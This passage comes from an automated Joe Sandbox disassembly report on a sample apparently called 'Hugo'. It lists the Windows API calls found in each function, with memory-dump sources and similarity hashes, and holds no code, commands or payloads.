                                                                                                                                                                                                                • Part of subcall function 00F42D38: RtlFreeHeap.NTDLL(00000000,00000000,?,00F4DB51,00FE1DC4,00000000,00FE1DC4,00000000,?,00F4DB78,00FE1DC4,00000007,00FE1DC4,?,00F4DF75,00FE1DC4), ref: 00F42D4E
                                                                                                                                                                                                                • Part of subcall function 00F42D38: GetLastError.KERNEL32(00FE1DC4,?,00F4DB51,00FE1DC4,00000000,00FE1DC4,00000000,?,00F4DB78,00FE1DC4,00000007,00FE1DC4,?,00F4DF75,00FE1DC4,00FE1DC4), ref: 00F42D60
                                                                                                                                                                                                              • _free.LIBCMT ref: 00F4DBB8
                                                                                                                                                                                                              • _free.LIBCMT ref: 00F4DBC3
                                                                                                                                                                                                              • _free.LIBCMT ref: 00F4DC17
                                                                                                                                                                                                              • _free.LIBCMT ref: 00F4DC22
                                                                                                                                                                                                              • _free.LIBCMT ref: 00F4DC2D
                                                                                                                                                                                                              • _free.LIBCMT ref: 00F4DC38
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 776569668-0
                                                                                                                                                                                                              • Opcode ID: 98b13fc91f4fe31fecb0273d364a71dd69e1171f55120a532e903f65f4669862
                                                                                                                                                                                                              • Instruction ID: ee7bc34691ba95bdd7f09e8e1ad8270eed00e5ccf654a628b82a16d38e388f82
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 98b13fc91f4fe31fecb0273d364a71dd69e1171f55120a532e903f65f4669862
                                                                                                                                                                                                              • Instruction Fuzzy Hash: FC114272941704A6D920BB70CC4BFCBBFEC9F44700F410C29BA99AA152D77DB5046651
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00F7E328
                                                                                                                                                                                                              • LoadStringW.USER32(00000000), ref: 00F7E32F
                                                                                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00F7E345
                                                                                                                                                                                                              • LoadStringW.USER32(00000000), ref: 00F7E34C
                                                                                                                                                                                                              • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00F7E390
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • %s (%d) : ==> %s: %s %s, xrefs: 00F7E36D
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: HandleLoadModuleString$Message
                                                                                                                                                                                                              • String ID: %s (%d) : ==> %s: %s %s
                                                                                                                                                                                                              • API String ID: 4072794657-3128320259
                                                                                                                                                                                                              • Opcode ID: 251410ed8b1ebfe90fbbd33c1076a8f264ef5117a36ee4716f8e425fbef994ac
                                                                                                                                                                                                              • Instruction ID: a9b7e7d4a9090d2c4cd34cbfb8a509c24c0cc8a85f8c8a35bc6f314a753e553e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 251410ed8b1ebfe90fbbd33c1076a8f264ef5117a36ee4716f8e425fbef994ac
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9E0186F290020C7FE751ABA4CD89EEB776CDB0D300F408592B74AE6541E6749E846B71
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • InterlockedExchange.KERNEL32(?,?), ref: 00F81322
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(00000000,?), ref: 00F81334
                                                                                                                                                                                                              • TerminateThread.KERNEL32(00000000,000001F6), ref: 00F81342
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00F81350
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00F8135F
                                                                                                                                                                                                              • InterlockedExchange.KERNEL32(?,000001F6), ref: 00F8136F
                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(00000000), ref: 00F81376
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3495660284-0
                                                                                                                                                                                                              • Opcode ID: 796e0a7049f5059faaba0d1d2292b924cc4bc1aa36bd2280647a170cc82ceae3
                                                                                                                                                                                                              • Instruction ID: 7abce57a16d41f165099ff1f5057623c9834266158a896c556a84af500a7ec4e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 796e0a7049f5059faaba0d1d2292b924cc4bc1aa36bd2280647a170cc82ceae3
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 22F0EC72442616BBD7412F54EE49BD6BB79FF46312F401121F10291CA08B749475EF90
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00F9281D
                                                                                                                                                                                                              • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00F9283E
                                                                                                                                                                                                              • WSAGetLastError.WSOCK32 ref: 00F9284F
                                                                                                                                                                                                              • htons.WSOCK32(?,?,?,?,?), ref: 00F92938
                                                                                                                                                                                                              • inet_ntoa.WSOCK32(?), ref: 00F928E9
                                                                                                                                                                                                                • Part of subcall function 00F7433E: _strlen.LIBCMT ref: 00F74348
                                                                                                                                                                                                                • Part of subcall function 00F93C81: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,?,?,?,00F8F669), ref: 00F93C9D
                                                                                                                                                                                                              • _strlen.LIBCMT ref: 00F92992
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _strlen$ByteCharErrorLastMultiWidehtonsinet_ntoa
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3203458085-0
                                                                                                                                                                                                              • Opcode ID: 9ec637315e87695b5e61eab57632c6473072355c2d3644743dcce2d9bb6b7dfe
                                                                                                                                                                                                              • Instruction ID: 1e00e28854d0242deb388a869cfc3557a38d3a3673c539794dba665a8c944c3f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9ec637315e87695b5e61eab57632c6473072355c2d3644743dcce2d9bb6b7dfe
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 99B1F435604300AFE724DF24CC85F6A7BE5AF84328F54854CF45A5B2A2DB35ED81EB92
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __allrem.LIBCMT ref: 00F4042A
                                                                                                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00F40446
                                                                                                                                                                                                              • __allrem.LIBCMT ref: 00F4045D
                                                                                                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00F4047B
                                                                                                                                                                                                              • __allrem.LIBCMT ref: 00F40492
                                                                                                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00F404B0
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1992179935-0
                                                                                                                                                                                                              • Opcode ID: f879b393e65d4db2631db90962c4ab5633f4520d067d5efed2ccc62c0ef88ee5
                                                                                                                                                                                                              • Instruction ID: aece46debe585deabe595ded36cfc1444c92094a0cb0b8796740993ca28040d8
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f879b393e65d4db2631db90962c4ab5633f4520d067d5efed2ccc62c0ef88ee5
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2C81CA72A007059BE720EE69CC41B6A7FA9AF45334F24412AFF11DB691EF74D900A794
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00F38649,00F38649,?,?,?,00F467C2,00000001,00000001,8BE85006), ref: 00F465CB
                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00F467C2,00000001,00000001,8BE85006,?,?,?), ref: 00F46651
                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00F4674B
                                                                                                                                                                                                              • __freea.LIBCMT ref: 00F46758
                                                                                                                                                                                                                • Part of subcall function 00F43B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,00F36A79,?,0000015D,?,?,?,?,00F385B0,000000FF,00000000,?,?), ref: 00F43BC5
                                                                                                                                                                                                              • __freea.LIBCMT ref: 00F46761
                                                                                                                                                                                                              • __freea.LIBCMT ref: 00F46786
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1414292761-0
                                                                                                                                                                                                              • Opcode ID: 29bc1a79a1bc6b667e1a752c98c6825525418de257ef8d9edfe8edfc2e15f16b
                                                                                                                                                                                                              • Instruction ID: ad5b76106b17151038098e058633e8c6b8db63fe2b195260cacf9d4a67d1ce90
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 29bc1a79a1bc6b667e1a752c98c6825525418de257ef8d9edfe8edfc2e15f16b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3B51D272A00206AFEB258F64CC85EAF7FAAEF42764F154669FD04D6140EF34DC50A6A1
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00F1B329: _wcslen.LIBCMT ref: 00F1B333
                                                                                                                                                                                                                • Part of subcall function 00F9D3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00F9C10E,?,?), ref: 00F9D415
                                                                                                                                                                                                                • Part of subcall function 00F9D3F8: _wcslen.LIBCMT ref: 00F9D451
                                                                                                                                                                                                                • Part of subcall function 00F9D3F8: _wcslen.LIBCMT ref: 00F9D4C8
                                                                                                                                                                                                                • Part of subcall function 00F9D3F8: _wcslen.LIBCMT ref: 00F9D4FE
                                                                                                                                                                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00F9C72A
                                                                                                                                                                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00F9C785
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00F9C7CA
                                                                                                                                                                                                              • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00F9C7F9
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00F9C853
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 00F9C85F
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1120388591-0
                                                                                                                                                                                                              • Opcode ID: 8db849728df03bc1e713357d75b790188f252f339e595b709df02cb521ea3767
                                                                                                                                                                                                              • Instruction ID: 98c9fc4b86d534aaad752a98b353c4fa655d0b0b8c350327f42f8d2958cd7e92
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8db849728df03bc1e713357d75b790188f252f339e595b709df02cb521ea3767
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3D81D271508241EFDB14DF64C881E6ABBE5FF84318F04845CF0954B2A2CB31ED45EB92
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • VariantInit.OLEAUT32(00000035), ref: 00F700A9
                                                                                                                                                                                                              • SysAllocString.OLEAUT32(00000000), ref: 00F70150
                                                                                                                                                                                                              • VariantCopy.OLEAUT32(00F70354,00000000), ref: 00F70179
                                                                                                                                                                                                              • VariantClear.OLEAUT32(00F70354), ref: 00F7019D
                                                                                                                                                                                                              • VariantCopy.OLEAUT32(00F70354,00000000), ref: 00F701A1
                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 00F701AB
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Variant$ClearCopy$AllocInitString
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3859894641-0
                                                                                                                                                                                                              • Opcode ID: 38956f4f50d809b0e1d11456f100188fb1f689db39aae15c1b63701e38bcfb6f
                                                                                                                                                                                                              • Instruction ID: 0a0ddc95085ca65433326f471b98dc365edaad624b0aaa22f0c5f1b2fe202d08
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 38956f4f50d809b0e1d11456f100188fb1f689db39aae15c1b63701e38bcfb6f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8D51A572550310EACF10AB64D899B69B3A5AF45320F14D447E80EEF297DE749C40EB97
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00F141EA: _wcslen.LIBCMT ref: 00F141EF
                                                                                                                                                                                                                • Part of subcall function 00F18577: _wcslen.LIBCMT ref: 00F1858A
                                                                                                                                                                                                              • GetOpenFileNameW.COMDLG32(00000058), ref: 00F89F2A
                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 00F89F4B
                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 00F89F72
                                                                                                                                                                                                              • GetSaveFileNameW.COMDLG32(00000058), ref: 00F89FCA
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _wcslen$FileName$OpenSave
                                                                                                                                                                                                              • String ID: X
                                                                                                                                                                                                              • API String ID: 83654149-3081909835
                                                                                                                                                                                                              • Opcode ID: d4e94c88f8486b234f4cbed4e6f7b0a59cef33c7ca7be109b4d07821a78889b6
                                                                                                                                                                                                              • Instruction ID: e482ddc52a2dd2d3715aa76f8e5ebcee17a847e509280d8a98ee70315e8512b0
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d4e94c88f8486b234f4cbed4e6f7b0a59cef33c7ca7be109b4d07821a78889b6
                                                                                                                                                                                                              • Instruction Fuzzy Hash: ADE1A331A08341DFD714EF24C881AAAB7E0FF85314F04856DF8899B2A2DB75DD45EB92
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 00F86F21
                                                                                                                                                                                                              • CoInitialize.OLE32(00000000), ref: 00F8707E
                                                                                                                                                                                                              • CoCreateInstance.OLE32(00FB0CC4,00000000,00000001,00FB0B34,?), ref: 00F87095
                                                                                                                                                                                                              • CoUninitialize.OLE32 ref: 00F87319
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                                                                                                                                                              • String ID: .lnk
                                                                                                                                                                                                              • API String ID: 886957087-24824748
                                                                                                                                                                                                              • Opcode ID: ff8e29f94130bb83146ef5bf07ffe0f4c6e5dced9e57cf1af50aaa51d2d7ca60
                                                                                                                                                                                                              • Instruction ID: 8b16d303af0526e72c19104fb98cc6dbd097ba30b0cc87cfe6d38e7aa3da9118
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ff8e29f94130bb83146ef5bf07ffe0f4c6e5dced9e57cf1af50aaa51d2d7ca60
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5BD16871608301AFC304EF24C881AABB7E8FF98744F50496DF5858B2A2DB35E945DB92
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00F1249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00F124B0
                                                                                                                                                                                                              • BeginPaint.USER32(?,?,?), ref: 00F11B35
                                                                                                                                                                                                              • GetWindowRect.USER32(?,?), ref: 00F11B99
                                                                                                                                                                                                              • ScreenToClient.USER32(?,?), ref: 00F11BB6
                                                                                                                                                                                                              • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00F11BC7
                                                                                                                                                                                                              • EndPaint.USER32(?,?,?,?,?), ref: 00F11C15
                                                                                                                                                                                                              • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00F53287
                                                                                                                                                                                                                • Part of subcall function 00F11C2D: BeginPath.GDI32(00000000), ref: 00F11C4B
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3050599898-0
                                                                                                                                                                                                              • Opcode ID: d047428559e780353de45b7a5ab2833445ef757a5fbd79a79e396fb70bd3119c
                                                                                                                                                                                                              • Instruction ID: 659c1b78cad3fa612cd75071ea5de7d28cbd52774c46aa584e7bfcd4d6a258d0
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d047428559e780353de45b7a5ab2833445ef757a5fbd79a79e396fb70bd3119c
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D941CF71508344AFD710DF28DCC4FAA7BA8FB46334F040669FA558A2A2D7309984FB62
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • InterlockedExchange.KERNEL32(?,000001F5), ref: 00F811B3
                                                                                                                                                                                                              • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 00F811EE
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 00F8120A
                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(?), ref: 00F81283
                                                                                                                                                                                                              • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 00F8129A
                                                                                                                                                                                                              • InterlockedExchange.KERNEL32(?,000001F6), ref: 00F812C8
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3368777196-0
